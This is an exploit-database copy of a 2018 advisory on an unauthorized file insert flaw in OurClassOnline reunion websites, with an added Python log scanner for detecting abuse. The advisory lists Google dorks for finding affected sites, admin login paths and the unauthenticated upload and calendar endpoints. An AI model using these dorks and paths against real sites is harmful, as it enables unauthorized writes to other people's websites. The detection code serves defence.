Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability

CVE: (not listed)
Category: CWE-264
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2018-11-13
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018110099

Below is a copy:

Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability
#################################################################################################

# Exploit Title : Web Portal People LLC 2018 OurClassOnline USA Unauthorized Arbitrary File Insert Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 13/11/2018
# Vendor Homepage : webportalpeople.com ~ ourclassonline.com 
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks : 
intext:''To obtain a site like this for your class visit www.ourclassonline.com.''
intext:''Copyright Web Portal People, LLC. 2018 - Maker of class reunion & family websites. All rights reserved.''
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]

#################################################################################################

# Admin and Moderator Panel Login Paths : 

/admin/index.php
/login_form.php?action=reunion
/login_form.php?action=news
/login_form.php?action=classmates
/login_form.php?action=gallery&galleryid=6
/login_form.php?action=gallery&galleryid=2
/login_form.php?action=gallery&galleryid=3
/login_form.php?action=year_review
/login_form.php?action=gallery&galleryid=4

#################################################################################################

# Exploit : 

/forum_topic_create.php?forumid=1

/files_forum/[RANDOM-NUMBER]_[YOUR-FILENAME-HERE].txt

/calendar_add.php

/calendar_event.php?eventid=[RANDOM-NUMBER]
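
For operators of affected sites, the following added example (not part of the original advisory) scans a web access log for successful POSTs to the two creation endpoints listed above from clients that never posted to one of the login paths, and for follow-up fetches of stored `/files_forum/` files by the same client. The combined log format, the use of POST for logins and writes, and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Paths taken from the advisory (query strings are stripped before matching).
LOGIN_PATHS = {"/admin/index.php", "/login_form.php"}
WRITE_PATHS = {"/forum_topic_create.php", "/calendar_add.php"}
STORED_FILE = re.compile(r"^/files_forum/\d+_[^/]+$")
# Assumed log format: Apache/nginx "combined".
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Nov/2018:10:00:01 +0000] "POST /login_form.php?action=news HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Nov/2018:10:00:09 +0000] "POST /forum_topic_create.php?forumid=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.50 - - [13/Nov/2018:10:02:11 +0000] "POST /forum_topic_create.php?forumid=1 HTTP/1.1" 200 512 "-" "curl/7.61"',
    '203.0.113.50 - - [13/Nov/2018:10:02:15 +0000] "GET /files_forum/48213_note.txt HTTP/1.1" 200 20 "-" "curl/7.61"',
    '203.0.113.50 - - [13/Nov/2018:10:03:40 +0000] "POST /calendar_add.php HTTP/1.1" 200 300 "-" "curl/7.61"',
]

def find_unauthenticated_writes(lines):
    """Return {ip: {"writes": [...], "files": [...]}} for clients that wrote without a login POST."""
    seen_login = set()
    findings = defaultdict(lambda: {"writes": [], "files": []})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, method, target, status = m[1], m[2], m[3], int(m[4])
        path = target.split("?", 1)[0]
        ok = 200 <= status < 400
        if method == "POST" and path in LOGIN_PATHS and ok:
            # Any accepted login POST counts; a failed login that returns 200 is a known blind spot.
            seen_login.add(ip)
        elif method == "POST" and path in WRITE_PATHS and ok and ip not in seen_login:
            findings[ip]["writes"].append(target)
        elif method == "GET" and STORED_FILE.match(path) and ip in findings:
            findings[ip]["files"].append(path)
    return dict(findings)

if __name__ == "__main__":
    for ip, hit in find_unauthenticated_writes(SAMPLE_LOG).items():
        print(ip, "writes:", hit["writes"], "stored files fetched:", hit["files"])
```

Client IP is a weak stand-in for a session, so treat hits as leads to confirm against application or session logs.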

#################################################################################################

# Example Vulnerable Sites =>


#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################
